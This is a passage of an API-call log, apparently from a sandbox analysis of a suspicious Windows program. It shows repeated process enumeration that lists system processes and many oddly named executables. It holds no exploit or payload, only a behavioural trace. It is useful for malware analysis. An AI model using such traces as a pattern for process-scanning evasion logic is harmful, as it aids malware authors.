cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.921] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.922] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.923] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.924] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.925] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.927] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.929] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.931] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.981] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.982] CloseHandle (hObject=0xbc) returned 1 [0106.982] Sleep (dwMilliseconds=0x12c) [0107.337] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.342] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.342] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.344] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.345] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.345] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.346] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.347] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.347] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.348] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.352] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.355] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.365] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.366] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.368] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.464] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.465] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.482] CloseHandle (hObject=0xc4) returned 1 [0107.482] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0107.487] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.488] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.489] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.491] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.491] Process32NextW (in: hSnapshot=0xbc, 